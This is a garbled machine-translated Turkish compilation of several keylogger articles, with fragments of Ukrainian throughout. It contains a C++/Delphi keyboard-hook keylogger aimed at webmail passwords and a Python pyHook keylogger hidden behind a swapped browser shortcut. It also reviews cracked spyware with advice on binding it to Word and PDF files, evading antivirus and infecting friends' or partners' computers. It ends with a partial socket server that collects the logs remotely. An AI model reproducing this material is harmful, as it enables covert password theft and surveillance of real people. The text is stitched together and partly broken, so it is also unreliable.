Pokrokove sf'de bir keylogger yazıyor.



Bilgi güvenliği laboratuvarı. Yak tse zrobleno

Klavye kısayolları yazma hakkında
rozpovidalos zaten bir kereden fazla, ama tüm pis koku
büyük bir nedolіk düşünmek - kural olarak,
daha fazlasını bilmem gerek
bilgi ve günlük dosyasına her şeyi yazmamak,
klavyede ne koristuvach yazıyor - zor chi you
çok düşün
CS'de oynarken düğmelere basmak 😉

Casusun ganimet olabileceğini haykıran sesler
hadi yapıştıralım ve aptalca kirişe her şeyi yazmayalım
ver 🙂 böyle bir programa Navit ismini ver
casus silahı dilini çevirmez - tse mayzhe
elektronik ajan 007 :-))) Shlyakhiv için
bu yüzden program ne tıklanacağını günlüğe yazdı
çok malzememiz var. En basit -
aktif pencereleri kontrol et, tobto. yaki'de
şu anda düğmelere basın 🙂 Yak tee,
Bence, bilirsin, spigunlar, kural olarak, toplanır
DLL olan simgeli dosya. Tse pov'yazano z tim,
geçiş için scho
yeni bir SÜREÇ oluşturmak gereklidir ve
Bunun için zruchne - vikoristovuvati dll-ku.
Bunun için etkinleştirmek için
iyi, kaydedicinin kendisi, onu kullanmanız gerekecek
DLL'yi alma anı ve eğer aktifse
başka bir şeye geç - canlılık її z hafıza.

Görselimin DLL işlevlerine bir göz atalım
C++. Dlls hakkında bilmece için meydan okuma gerçekleştirilir
function hINSTAGE=LoadLibrary("name.dll"), de hINSTAGE -
yak bi tanımlayıcısı zavantazhenoї bellek DLL'sinde,
name.dll kütüphanenin adıdır. Shchob її canlılık,
FreeLibrary'nin (hINSTAGE) ana işlevi;

Şimdi bunlar hakkında, nasıl ihtiyacımız olabilir?
programlar. Örneğin, biliyoruz ki koristuvach
postayı www.mail.ru web sitesi aracılığıyla okuyun, ardından
ajanı kazanacak şekilde çivileyin
coristuvach cey girerse anahtarların saldırısı
İnternet sitesi. (Hafızayı takip et, geçmişte ne
dodatakh spigun klavye vzagali değil
belki pratsyuvati, örneğin adres satırında
Internet Explorer "a - ce" acil duruma getirmek için
programın tamamlanması" - başka ne görüyorsunuz
Windows hot_v :))) Hangi yöntem için bir bütün olarak
pidide ve çeviriciden şifreleri oku
- bir koristuvach olarak paranoya ve vicdan azabı çekiyor
giriş yapın ve manuel olarak geçin 🙂 Veya
Outlook'ta yazmak için cіkavo dіznatisya scho veya
not defterinde. Vikonu kodunun bir kısmının ekseni
İhtiyacımız olan viconların başlıklarının değiştirilmesi.

HINSTAGE hINSTAGE;

süre(1)
{
// Döngüyü başlat.

int sl,ll;
ll=1;
sl=2;
// için değiştir
likilnika.
karakter;
HWND hw;
//Demo basittir
shlyakhom - karakter bazında rastgele satırlar:
gösterinin başlığını kaldırın ve bizim için ona ihtiyacımız olacak
yan yana.

while (ll != sl)
{

hw=GetForegroundWindow();
GetWindowText(hw,st,128); // okunabilir

char stt="_Burada gerekli olanın başlığını yazıyoruz
bize vіkna_№1";

sl=strlen(stt);
ll=0;
while (stt==st)
// eşit
karakter karakter satırlar
// bu pozisyonlarda çalışmak daha iyi, ne olacak
girmek için gerekli olan çevirmek
// Bir sonraki satırdaki bir parça gibi bir satırdayız, yapabilirsiniz
zrobiti gibi // geniş filtre.
{
ll++;
}

if (ll==sl) ( // satırlar gibi
1. sıranın sonuna kadar koş -
dur; // işlemi kes
}
// ve şimdiye kadar - gibi
Bir dizi vicon'un görünümünü tersine çevirmek gerekir.
char stt="_Burada gerekli olanın başlığını yazıyoruz
bize vіkna_№2";
sl=strlen(stt);
ll=0;
while (stt==st)
{
ll++;
}

if (ll==sl) (
dur; // işlemi kes
}

Sonraki revizyonu değiştirebilirsiniz
hizalarsanız paralel tutun
sadece bir tane bile olsa, bir satırdaki öğelerin bir döngüsü
zbіglasya - daha sonra DLL casus tabancası etkinleştirilir.

hINSTAGE=LoadLibrary("key1.dll");

Şimdi tüm saati yeniden yazmamız gerekiyor,
chi her zaman aktiftir.

while (ll==sl) //belgeler
satırlar zbіgayutsya - mіstsі üzerinde dönüyor
{
hw=GetForegroundWindow();
GetWindowText(hw,st,128);// okunabilir
aynı anda daha aktif.
ll=0;
while (stt==st)
{
ll++;
}
}

Aktif olanlar hakkında konuşmak için döngüyü bırakın
aniden değişti, buna bir vivantazhuemo "casus tabancası" verildi
kütüphane ve döngü koçandan başlar - tobto.
program vipade'in yalnız olup olmadığını tekrar kontrol edecek
viconlara ihtiyacın var.

FreeLibrary(hINSTAGE);

Bununla birlikte, yöntemin yukarıdaki açıklamaları
nedolіki - yeniden düşünmek gerekiyor
vikon chi'nin tüm listesinden є ihtiyaç
şu anda aktif. Tom
başka bir algoritma kullanabilirsiniz - geçersiz kılmayın
gösterinin başlığı, ancak verilenlerde olduğu gibi hayret
EditBox "a tipindeki öğeleri görüntüleyin. Kural olarak,
şifreler orada kendin yazılıyor 🙂 Kime yazacak
vikna unsuruna hayret edin - ve yakscho
є Düzenle - tıpkı bir DLL gibi.

karakter p2, p3; //masivi
pencerelerin başlıkları için semboller.

Tüm viknaları yeniden doğrulayarak döngüde de aynı şeyi biliyorum:

while(p3 !="Düzenle") //belgeler
düzenleme kutusunu bilmiyordum - vikonuemo döngüsü
{

hw=GetForegroundWindow();

HWND hwnd_child; // değişiklik
vikna öğesi

hwnd_child = GetWindow(hw,GW_CHILD);
GetClassName(hwnd_child, p3, 128);
if (p3!="Düzenle")
// İlk olarak
penceredeki bilinen öğeler - EditBox değil - aynı
şaka uzaktan
{
süre(hwnd_child != 0)
{
hwnd_child = GetWindow(hwnd_child, GW_HWNDNEXT);

GetClassName(hwnd_child, p3, 128);
if (p3=="Düzenle")
{
dur;
}
}
}
}

Şimdi shpigunsku DLL hakkında vlasne.
Delphi'de її daha güzel yaz, bo cey
Pascal'ın erkeksi dolgusu olamaz
"Sipishnoy" sesleri
prichipki'den veri türlerine. Shchob oluştur
Dosya-Yeni-Doğrudan Bağlantı Kitaplığını seçin - i
DLL için hazırlık hazır. Ve eksenin kendisi koddur:

kitaplık anahtarı1;
Windows'u kullanır;

var
HOOK: HOOK; // için değiştir
"makarna"

function KProc(Kod: tamsayı; wParam: Word; lParam: LongInt): LongInt; standart çağrı;
const
KState: tamsayı = 1073741824; //kod
"Basılı tuş"

var
Simv: Kısa Dize;
KL: Karakter dizisi; //için
klavye düzeni revizyonları
FStruct: TOFSTRUCT;
F: Metin Dosyası;// değişiklik
log dosyası.

başlamak

// giriş yapmak
hatırlatma
if (lParam ve KState)<>0 o zaman
başlamak

çıkış;
son;

AssignFile(F, "keylog.txt");

// bir vodcrity yapacağız
"keylog.txt" dosyası:
OpenFile(PChar("keylog.txt"), FStruct, OF_EXIST) = HFILE_ERROR ise
başlamak
Yeniden Yaz(F);// hangi dosya değil
yarattık - yaratıyoruz.
son
başka Ekle(F);
//yakscho є - yazın
son.

Simv:=chr(0); // null
Klavyeden okunan karakteri değiştirin.

// kodu ayrıştırma
basılan tuş
durumda wParam of
// sayılar
48..57: Simv :=Chr(wParam);
96: Simv:="0";
97: Simv:="1";
...
104:simv:="8";
105: Simv:="9";
189.109: Simv:="-";
110: Simv:=".";
111: Simv:="/";
son;

GetKeyboardLayoutName(KL); //
düzeni yeniden kontrol etme
yaksho KL = "00000409" o zaman // yakscho
Latince:
başlamak
durumda wParam of
219: Simv:="[";
221: Simv:="]";
186: Simv:=";";
222: Simv:=""";
188: Simv:=",";
190: Simv:=".";
191: Simv:="/";
65..90: Simv :=Chr(wParam);
son;
son;
son;
yaksho KL = "00000419" o zaman// yakscho
Rusça
başlamak
durumda wParam of
219: Simv:="X";
221: Simv:="b";
186: Simv: = "F";
222: Simv:="E";
188: Simv:="B";
190: Simv: = "Yu";
191: Simv:=".";
65: Simv:="F";
...
87: Simv:="C";
88: Simv:="H";
89: Simv:="H";
90: Simv: = "Ben";
son;

// Bu karakter boş değil (yani.
alfanümerik bir tuşa basıldığında)
// Ardından yoga dosyasını yazıyoruz
eğer simv<>"" o zamanlar
Yaz(F, Simv);
//dosyayı kapat
Dosyayı Kapat(F);

// bildirim gönder
sistemdeki diğer pastkalar
Sonuç:=CallNextHookEx(KHook, kod, wParam, lParam);
son;

başlamak
//Yapıştır Ekle
referans için, klavye hakkında konuşalım.
KHook:=SetWindowsHookEx(WH_KEYBOARD, @KProc, HInstance, 0);

Bu programa da sorabilirsiniz.
zastosuvannya - yakscho alanında nadas
kabul edilebilir ihtiyaç sadece bir kez rahuvati
çeviriciden şifre - aynısını ayarlayabilirsiniz
perevirku bizim ihtiyaçlarımıza göre ve eğer olmazsa
aktif ol - kütüphaneyi devral
key1.dll için ilk saati alın
yak koristuvach vstigne qi sembollerini doldur
klavye ve ardından kitaplığı canlandırın
programı sonlandırın. Yaklaşık olarak 🙂

hINSTAGE=LoadLibrary("key1.dll");
uyku (10000);
// Chekati 10 saniye, tse başına
Saat koristuvach şifreyi çevirin.
//saat daha nadasa olabilir
coristuvach'ın galvanizleme aşaması türü
// klavyedeki o yoga hızı 🙂
FreeLibrary(hINSTAGE);

Not: Tüm yenileme malzemeleri verilmiştir
demolar dahil
kutsal aydınlatıcı hedefler, yazar ayarı
senin önünde gösteren
algoritma robotik programları "yükseltmeler" yazın
klavye spigun" ve hepsi
kazanma ödülü
malzeme üzerinize düşüyor (ezici
çektirme 🙂) Uygulama kodu var
diğer yanlışlıklar
algoritma - kendiniz tanımaya çalışın))).

PSS: Açıkçası, bir keylogger olmayabilir
ana işlevinizi yen -
Düğmelerin saldırısının günlüğüne yazmak daha iyidir, ale th
basılan tuşların değerini kendinize göre değiştirin
zevk - ne için ale yak tse robiti i
belki sadece hayat gereklidir -
gelecek zaman 🙂

Merhaba, size QUAZAR diyorum. Bugün size Python'da basit bir keylogger'ın nasıl oluşturulacağını göstereceğim. Zrozumіlo, tsey klavye casus tabancası böyle devlerle sallanamaz, ancak her şeye bakılmaksızın, zastosuvannya'nızı bilebilirsiniz.

Keylogger nedir?

Böyle bir keylogger olanlar ve keylogger'ları görmek hakkında raporlar, "" makalesini okuyabilirsiniz. Konuyla ilgili ek materyaller bulmak için, sağ üst köşede bulunan sitede arama yapın. Sadece keylogger veya klavye itici kelimesini girin.

Python'da Basit Keylogger

Bir keylogger oluşturmak için şunlara ihtiyacımız var:

• İşletim Sistemi: Windows veya MacO'lar
• Tüm bir Python makinesindeki kurulumların yanı sıra özel kitaplıklar.

Bu materyal, doğası gereği bilgilendiricidir. Vikladena'da istatistik bilgileri sadece bilgiye dayalı bir yöntemle verilmektedir. Herhangi bir hatadan ne www.site sitesinin yazı işleri müdürlüğü ne de yayının yazarı sorumlu değildir, makalenin başlığı makalenin yazarıdır.

Python'da basit bir keylogger oluşturma

Başlamak için Python'u yüklemeniz gerekir.

Python'u kurduktan sonra "pyHook" ve "pywin32" modüllerini kurmanız gerekiyor. Bu sitede Windows ve diğer işletim sistemleri için 32 bit ve 64 bit sürümleri bulacaksınız. PYhook ve pyWin32'yi yüklediğiniz Python ve Windows sürümüne yükseltin (32 bit veya 64 bit).

Yüklemek istediğinizde Başlat menüsünden IDLE (Python GUI) menüsünü açın.

"Dosya" menüsüne gidin ve "Yeni Dosya" öğesine tıklayın. Ardından keylogger kodunu yapıştırın:

#İsim: QUAZAR
#Web sitesi: www.web sitesi
pyHook, pythoncom, sys, günlük kaydı içe aktar
file_log = "C:keyloggerlog.txt"
def OnKeyboardEvent(olay):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format="%(message)s")
chr(olay.ascii)
logging.log(10,chr(event.ascii))
dönüş True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown=OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMesajlar()

Keylogger.pyw dosyasını adlandırarak biraz tasarruf edin. Sadece dosyayı C kök dizininden kaydetmeyin: o dosyayı kopyalamak için yönetici haklarına ihtiyacınız var. C sürücüsünde yeni bir klasör oluşturun: aksi takdirde, başka bir konumda, dosyaları kopyalamak ve Keylogger.pyw dosyasını buraya kaydetmek için yönetici haklarına ihtiyacınız yoktur.

“file_log =“ C: keyloggerlog.txt ” adında bir çıktı dosyası olarak, bir yer olup olmadığını veya bir sabit diske bağlıysa daha iyi olduğunu seçebilirsiniz. Hangi uygulamadan zvіtu dosyasını C: kök dizinindeki diske kaydedeceğim. Aje bana kapılacak bir şey yok.

Python'da bir keylogger'ın otomatik başlatılması

Keylogger hazır. Şimdi, keylogger'ın Windows ayarlarından otomatik olarak başlatılacağı şekilde çalışmanız gerekiyor. Farklı uygulayabilirsiniz. Yarasa dosyasına yardım için zrobiti'yi deneyelim, keylogger'ın başlatılmasını herhangi bir programa bağlayarak veya otomatik girişe kaydederek.

Bir bat dosyası oluşturacağım. Aşağıdaki kodu kopyalayıp not defterine yapıştırın:

::İsim: QUAZAR
::Web sitesi: www.web sitesi
@Eko kapalı
"" "C:keyloggerkeylogger.pyw" başlat
başlat "" "C:Program FilesOperalauncher.exe"

İlk satırda keylogger.pyw dosyasına bir yol girmeniz gerekiyor (benim durumumda "C: keylogger.pyw"). Başka bir satırda, programın yolunu girmekle sorumlusunuz, bu yüzden vikoristova koristuvach'ı arayın (aklım için - Opera tarayıcısı).

Düzenledikten sonra, dosyayı .bat uzantısına (oturum açma logger.bat dosyamda) bilgisayarda ekli bir konuma kaydedin ("C:keylogger.bat" oturum açma işlemimde).

Şimdi çalışma stiline geçelim ve sık kullanılan bir program için bir kısayol seçelim (tarayıcım Opera). Ayıya sağ tıklayıp içerik menüsüne tıklıyoruz ve kısayolun yetkisine gidiyoruz. Nesne alanına, keylogger bat dosyası C:keylogger.bat yolunu girin.

Değişiklik yapıldıktan sonra kısayol simgesi de değişecektir. Alece, güce katkıda bulunanlar için suçlamak kolaydır (ekrana hayran kalın).

Aramızda kim kendini en az bir kez havalı bir hacker ve zlamati poposu olarak görmek istemez ki? :) Bilmek isteyip istemediğinizi, o zaman bunlar hakkında, postadan / sosyalden şifreyi almak iyi olur. merezhi arkadaş, takım / kişi, susіda kіmnati'de bir zamanlar deri yapmak istediğimi düşünüyorum. :) Bunu düzeltmen gerekiyor, zreshtoyu! Pek çok saldırı (kötü amaçlı saldırı), kurbanın bilgisayarına keylogger'lar (casus yazılım) olarak adlandırılan bulaşmayı içerir.

Daha sonra, bugünün makalesinde, kimlerden bahsedeceğiz. pencerelere dayalı bilgisayarlarda çalışmak için bezkoshtovnі programları, de mozhna zavantazhit їх yeni sürümler, kurbanın bilgisayarına onlarla bulaşmak gibi ve neden varyantlarının özelliği.

Ale, arka arkaya, çok az sıkışıklık var.

Keylogger'lara ne için ihtiyacınız var?

Böyle olanlar hakkında, sanırım, Kendin tahmin ettin. Kural olarak, koku, kurbanın bilgisayarına eklenmiş (bunu yapmak istemiyorsanız) gibi bir program gibidir, ardından bu düğümdeki klavyedeki her şeyi kesinlikle düzeltir. Bu suçun kendisiyle, kendi baskınıza göre, sabit görünecek: saldırının tarih-saati (dії), bu durumda, vikonanі (tarayıcı, sitenin adresi de dahil olmak üzere (Yaşasın, vіrazu bachimo, vіd chogo passwords!); yerel ek; systemnі hizmetleri (Windows oturum açma şifreleri vb. dahil).

Sorunlardan birini açıkça görebilirsiniz: Suidka'mın bilgisayarına birkaç dakika erişim sağladım ve şifreyi VK'dan almak istiyorum! Mucize programını yükleyerek ve bilgisayarı çevirerek. Şifreleri nasıl görebilirim? Bilgisayarı ondan nasıl alacağını biliyor musun? Є kabul edilen yenilik: kural olarak, nі. Keylogger'ların çoğu artık yerel olarak birikmiş tabanın tamamını kaydetme ve yine de onu daha uzakta yeniden mühürleme olasılığı daha yüksektir. Günlükleri yönetme seçenekleri esasen anonimdir:

• Sabit e-posta (muhtemelen kilka) - en iyi seçenek;
• FTP sunucusu (VIN є olan);
• KOBİ Sunucusu
• Bir flash sürücü sabittir (bunu kurbanın bilgisayarının USB bağlantı noktasına takın ve tüm günlükler görünmez modda otomatik olarak oraya kopyalanır!).

Her şey gerekli mi? Bence konu açık. Şifrelerin, kilitli tuş kaydedicilerin ve bir dizi resepsiyon konuşmasının banal çalınması suçu:

• Sosyal görevlerde günlük kaydı. merezhakh chi habercileri (örneğin, Skype).
• Ekran görüntüsü yakalama.
• Pereyad / web kamerasından veri yakalayın (ki bu daha zor olabilir).

Keyloggery nasıl hacklenir?

Ve yemek kolay değil. Sadece iyi bir fonksiyonel keylogger bilmenin yeterli olmadığını anlamak gerekir.

otze, başarılı bir robotik casus yazılım için gerekenler:

• Uzak bilgisayara yönetici erişimi.
  Üstelik obov'yazkovo çok fiziksel erişim değildir. RDP (Uzak Masaüstü Hizmeti) üzerinden giriş yapabilirsiniz; ekip görüntüleyici; AmmyAdmin vb.
  Kural olarak, bu açıdan en çok katlanan yerler bağlanır. Ancak, yakın zamanda Windows'ta yönetici haklarının nasıl alınacağı hakkında bir makale yazdım.
• Anonim e-posta/ftp (bunun için sizden ücret talep etmeyin).
  Açıkçası, Susidov Şura'yı okuduğunuz için bu paragrafı cesurca atlayabilirsiniz. Tıpkı bir vipadku'nuz olduğu gibi, elinizde bir kurbanın bilgisayarı varmış gibi (alya, bir erkek kardeşin / ablanın şifrelerini öğren).
• Vidsutn, Windows'u korumak için çalışan antivirüsler / dahili sistemler.
  Daha fazla genel tuş kaydedici (aşağıya bakın) ve daha önemli anti-virüs yazılımı (virüs kaydedicilerin işletim sisteminin çekirdeğine mi yoksa sistem sürücüsüne mi girmesi gerekiyor ve anti-virüsler artık onları algılayamaz, yok edemezler. , yapamazlar). Yukarıdakiler sayesinde, virüsten koruma yazılımı ve aynı şekilde acımasızca yok edilecektir. Tamam, antivirüsler, casus yazılımlarımızın Windows Defender ile aynı sisteme dönüşmesi güvenli değil (bunlar daha önce Windows 7 ve sonrasında ortaya çıktı). Koku, çalışanın bilgisayardaki faaliyetinden şüpheleniyor. Onlar hakkında bilgi edinmek isteyenler hakkında Google'da kolayca bilgi edinebilirsiniz.

Eksen, belki ve diğer insanların şifrelerini / broşürlerini / fotoğraflarını çalmak için başka nelere tecavüz etmek isteyebileceğinizin topraklarında başarınıza yeterince dikkat edin.

Casus yazılımları ve de їx'i nasıl indirebilirsin?

Daha sonra, ana keylogger'lara bir bakış attıktan sonra, en son sürümlerinin ücretsiz indirilmesinin yardımıyla günlük uygulamalarımda kazanma şansım oldu (bu nedenle tüm sürümler şimdilik kaldı (yüzleri gerçekten bilenler için) ve zaten testçiler ve vikiler).

0. Fare!

Puanlar (10 üzerinden):

• Ek: 10
• Verimlilik / Kullanılabilirlik: 9
• İşlevsellik: 8

Tse sadece bir bomba, keylogger değil! İş istasyonunda 15-20 KB oturun. Neden merak ediyorum: Çoğunluğu montajcıda yazdığı için (kıdemli programcılar ağladı) ve büyük olanı bilgisayar korsanları meraklıları tarafından yazıldığı için;

Ayrıca paket, keylogger'ı herhangi bir programa yapıştırmanıza izin veren mini bir program olan FileConnector'ı içerir. Sonuç olarak, hemen hemen aynı boyutta yeni bir exe dosyasını kabul edeceksiniz ve başlattığınızda, yapıştırdığınız program gibi çalışır! İlk başlatmadan sonra, keylogger'ınız, günlükleri zorlamak için ayarladığınız parametrelerin arkasından otomatik olarak görünmez moda ayarlanacaktır. Kullanışlı, değil mi?

Sosyal mühendislik için harika bir fırsat (bir arkadaşınıza flash sürücüde bir dosya oyunu/sunu getirin, sadece bir Word belgesi yazabilirsiniz (sonraki makalelerinizden birinde belirli bir kelime/excel dosyasını başlatan bir exe-ik'nin nasıl oluşturulacağı hakkında). ), başlat , her şey iyi ve güzel, ancak bir arkadaş görünmez bir şekilde zaten enfekte!). Aksi takdirde, bu dosyayı postayla bir arkadaşınıza yükleyin (indirmek için göndermekten daha iyidir, böylece posta sunucuları exe dosyalarını indirebilir ve yönetebilir). Açıkçası, kurulum sırasında bir antivirüs riski vardır, ancak yine de gerekli olabilir (o zaman kurulumdan sonra olmayacaktır).

Bu arada, diğer bazı cihazların yardımı için, yalnızca exe dosyalarıyla değil (birkaç troch durumunda olduğu gibi) ekli kurulumun herhangi bir dağıtım kitini (The Rat! ve Elite keylogger'da olduğu gibi) yapıştırabilirsiniz. güdük coristuvachs, hepsi aynı, şüpheleri çağırıyorlar), harika bir kelime / Excel ve pdf dosyaları ile bira! Zaten basit bir pdf-ku'da hiçbir şey düşünemiyorsunuz, ama orada değil! :) Nasıl korkulur bütün bir yazının konusu. Özellikle zavzyatі bana bir dönüş bağlantısı şeklinde beslenme yazabilir. ;)

Zagalom, Fare! uzun uzun anlatabilirsin ve çok. Kudi benim için daha iyi, eksen ezilmiş. İndirme isteği var.

1. Elit keylogger

Puanlar (10 üzerinden):

• Ek: 10
• Verimlilik / Kullanılabilirlik: 9
• İşlevsellik: 8

Mabut, şimdiye kadar oluşturulmuş en iyi keyloggerlardan biri. 20'ye kadar olasılık, standart setin ötesinde (tüm eklentiler / vicon'lar / sitelerle örtüşüyor), aşırı yüklenen haberciler, web kamerasından resimler ve ayrıca - daha da önemlisi! - WinLogon hizmetinin şifrelerini değiştirin. Başka bir deyişle, Windows'ta oturum açmak için parolaları değiştirebilirsiniz (alan adları dahil!). Robotları sistem sürücüsü düzeyinde başlatmak ve işletim sistemi geliştirme aşamasında başlatmak mümkün hale geldi. Özellik adına, bu program Kaspersky ve diğer anti-karıştırıcı yazılımlar için tamamen görünmezdir. Biliyorum, taksi üzerine kurulu özel bir keylogger oluşturmadım.

Eh, koruyucu zaten güçlü bir şekilde susmak değil. Yükleyicinin kendisi antivirüsler tarafından daha kolay tanınır ve kurulumu için yönetici haklarına ve tüm antivirüs hizmetlerini ve hizmetlerini etkinleştirmeye ihtiyacınız vardır. Kurulduktan sonra, her şey her durum için mükemmel olacaktır.

Ek olarak, hangi tuş kaydedicilerde çalışacağı işletim sistemi sürümüne destek sağlamak için özel bir özellik (işletim sistemi çekirdeğine dayalı bir robot) açıklanmıştır. Sürüm 5-5.3 (aşağıda gezinmek için güçlendirilmiştir), Windows 7 dahil olmak üzere her şeyi destekler. Win 8/10 ve sunucu ailesinin pencereleri (2003/2008/2012) artık desteklenmiyor. Є Mucizevi bir şekilde çalışan sürüm 6, dahil. Win 8 ve 10'da şu anda crackli versiyonu bilmek mümkün değil. Mabut, gelecek ortaya çıkacak. Bu arada daha fazlası için Elite keylogger 5.3'ü indirebilirsiniz.

Vikoristannya robotları için (spіvrobіtnikіv bilgisayarlarında çalışmak için) ancak tüm grup osіb değil, eskrim çalışması modu yoktur.

Önemli bir nokta, özelleştirmelerle kurulu bir dağıtım kiti oluşturma olasılığıdır (örneğin, günlüklere güç eklemeniz gereken belirli bir adresten, postadan). Ayrıldığınızda, başlangıçta herhangi bir ilerleme veya vicon görmeyen dağıtım kitini kaldıracaksınız ve kurulumdan sonra kendiniz oluşturabilirsiniz (bu, seçeneğin farklı olduğu anlamına gelir).

5. versiyonun ekran görüntülerinin bir kopyası (kızaklarda her şeyin güzel ve kullanışlı olduğunu göstermek için):

2. Hepsi bir arada keylogger.

Puanlar (10 üzerinden):

• Ek: 3
• Verimlilik / Kullanılabilirlik: 9
• İşlevsellik: 8

Aynı zamanda zor bir şey. Elite keylogger'da bir bütün olarak işlevsellik. Eksen zі skritnіstyu doğru girsche. Winlogon şifreleri artık ele geçirilmiyor, kazanan sürücü є değil, çekirdeğe zorlanmıyorlar. Ancak, üçüncü taraf sürücülerin erişmesi o kadar kolay olmayan (bu kurulumların adına değil) AppData dizininin sistemine ve eklerine kurulur. Prote antivirüsleri erken chino soymak için başarı ile, yani qiu zengin soymak için gerekli değildir nadіynoy i vikoristanny ile bezpechnoy, örneğin, yetkililerin görevi için çalışmak zorundasınız. ;) Başka bir şey yapıştırın veya antivirüslere eklemek için kodu şifreleyin, gitmeyin.

Pratsyuє OS Win'in herhangi bir sürümünde (pratik olan).

Başka ne olursa olsun, her şey harika: her şeyi günlüğe kaydedin (Windows'a girmek için parola oluşturma), her yere aktarma (e-posta, ftp, sabit flash sürücü dahil). Zruchnist için her şey mucizevi.

3. Spytech SpyAgent.

Puanlar (10 üzerinden):

• Ek: 4
• Verimlilik / kullanılabilirlik: 8
• İşlevsellik: 10

Çok itibarsız keylogger, şifreli olsa bile. İşletim sistemi sürümlerini desteklemek de mümkündür. İşlevsellik önceki seçeneklere benzer. Іsnuє tsіkava belirli bir süre sonra (veya önceden belirlenmiş bir tarihe ulaştıktan sonra) kendi kendini imha etme işlevi.

Ek olarak, bir web kamerasından video ve bir mikrofondan ses kaydı yapmak da mümkündür, bu da talep edilebilir ve önceki iki temsilciden temin edilemez.

Є Tüm bilgisayar ağına ayak uydurmak için kullanışlı olan robotik mod. Vin, konuşmadan önce, є StaffCop'ta (etrafa bakmadan önce, bir coristuvach - fiziksel birey için kenar boşluğundan eklemeler değil). Belki de bu program robotların kendi spivrobitniklerini takip etmeleri için idealdir (bu alandaki lideri StaffCop ve LanAgent'ı korumadan ister - örneğin, Vi - jur. Kişi, obov'yazkovo'nun bisikletlerine hayran kalmasını ister). Ancak, yavrularınızı takip etmek için, büyükler için oturup sitelere bakmayı seviyorsunuz. Tobto. orada, eklenmemek, ancak sitelerin / programların görevlerini engelleme işlevi (SpyAgent'ta aynı) olan (bir sürü güzel dergi dahil olmak üzere) daha verimli olmak daha gereklidir.

4. Spyrix kişisel monitör.

Puanlar (10 üzerinden):

• Ek: 4
• Verimlilik / kullanılabilirlik: 6
• İşlevsellik: 10

Önceki adayın dengi üzerinde işlevsel, ancak bütünlükle ilgili sorunlar var. Ek olarak, işlevsellik zengin bir ağustosböceği içerir: bilgisayara takılı USB taşıyıcılardan dosya kopyalama ve ayrıca Spyrix web sitesindeki bir web hesabı aracılığıyla günlükleri uzaktan gözden geçirme).

5. Spyrix kişisel monitör.

Puanlar (10 üzerinden):

• Ek: 3
• Verimlilik / kullanılabilirlik: 6
• İşlevsellik: 8

Raporlama tarif edilemez, tk. Keylogger'ın bu kopyası, ön spiger'lardan birinde olmayacak hiçbir şeyi yapamaz, ancak bazı keylogger'lar ruha düşebilir (en azından kendi arayüzü ile).

Sonuç ne olabilir?

Keylogger'ın güç kaynağı daha etik, daha az tekniktir ve amaçlarınız için daha fazla kullanılır.

Aynı şekilde, kendi spivrobitnikivini kontrol etmesi, StaffCop'u cesurca koyması, spivrobitnikiv mektuplarınızdan alması ve bu tür eylemlere izin vermesi (ve ayrıca, böyle bir iş için sizi oldukça iyi alabilirler) ve tam zamanında yapması gereken bir robot tedarikçisisiniz. pelerin. Spivrobitniklerimin pratiğini geliştirmenin özellikle ve etkili yollarını bilmek istiyorum.

Sadece test ettiğiniz bir BT-fahivets-pochatkіvets iseniz, yapmazsanız - bir aptalsınız - ve sağda çalışıyorsanız, sosyal mühendislik yöntemlerini kullanın ve arkadaşlarınız, vikoristovuyuchi üzerinde test yapın be-yaky z indüksiyonu. Bununla birlikte, unutmayın: kurbanlar tarafından bu tür faaliyetlerin tezahürü, dostluk ve uzun ömür bile sağlamaz. ;) Robotunuzda kesinlikle doğrulama yapmıyorum. Sözlerimi hatırla: Anladım. ;)

Şey, senin metan bir kız arkadaşın, bir kişinin, bir yargıcın peşinden koşmak ya da belki, düzenli olarak ve bir kuruş için çok çalışıyorsun, iyi düşün, chi varto. Adzhe erken chi pizno alabilir. Bu öyle değil: "başka birinin dolaşan beyazlığına dalmak - resepsiyonistlerden memnun değil." Hala ihtiyacınız varsa (veya belki de bilgisayar yaramazlıklarını araştırma alanında çalışıyorsanız ve böylece profesyonel ayakkabılarınızı girebilirsiniz), o zaman sadece iki seçeneğiniz var: Sıçan! ve Elite Keylogger. Word/excel/pdf'ye yapıştırılmış kurulum dağıtım kitleri ekleme modunda. Kısacası, mümkün olduğu kadar yeni bir kriptolayıcı ile şifreleme. Sadece her an az çok güvenli aktiviteyi ve gerçek başarıyı garanti edebilirsiniz.

Ancak her durumda, keylogger'ları daha yetkin kullanmanın daha iyi olduğunu unutmayın - hedefe ulaşmak için yalnızca küçük bir lanka (basit saldırılar başlatmak dahil). Yönetici haklarını almayın, fiziksel erişim elde etmeyin ve tüm koristuvach'lar açık olmayacak, ekinizi / isteğinizi daha fazla okuyacak ve indirmeyecek (özel sosyal mühendislik), yine de antivirüs / keylogger / şifrenizi açmaya başlamayın . Bütün bunlar ve daha birçok sorunun üstesinden gelinebilir, ancak diğeri bir dizi başka makalenin konusudur.

Tek kelimeyle, Şahitler katlanabilir, güvensiz ve hatta daha fazla cicavi bilgi güvenliği dünyasına girmeye başladılar. :)

Saygıyla,Lisyak O.S.

Ve önce, okumadan önce devam edin - yazarımın programlama, viroloji ve diğer konuşmalar hakkındaki makalelerini yayınladığım bloguma göz atın
Orijinal makale

Tüm bilgiler sadece bilginiz için verilmiştir. Bu makalenin materyalleri tarafından boyun eğdirilen olası herhangi bir yaramazlık için ne yönetim ne de yazar sorumlu değildir.

• Visual Studio 2015 Topluluk Güncelleştirmesi 4
• Görsel C++ 2015

• İstemciden veri alıp konsolda görebilmeniz için konsol programı

• Sunucudaki tuşlara basmanın yolu olan keylogger'ın kendisi olan Vlasne

sunucu
Visual Studio'da bir C++ konsol programı oluşturuyoruz.
Bütün kod ofiste. MSDN poposu - *İnceleme için foruma bakın. *
Önemli işleri yenisiyle değiştirmemiz gerekmez.
Sabit değişiklikleri yazalım: arabellek boyutu ve günlüklerin gönderildiği sunucu bağlantı noktası

kod:

#define DEFAULT_BUFLEN 1024 //Tampon #define DEFAULT_PORT "1337" //Port

kod:

Do (ClientSocket = kabul(ListenSocket, NULL, NULL); //Bağlantıyı kabul et iResult = recv(ClientSocket, recvbuf, recvbuflen, 0);//Günlüğü oku if (iResult > 0) //Günlük boş değil printf( "% s", recvbuf); // Closesocket'i görüntüle(ClientSocket);//tarihi kapat memset(recvbuf, 0, sizeof recvbuf);//Hafızayı geri yükle) while (true);

Müşteri

kod:

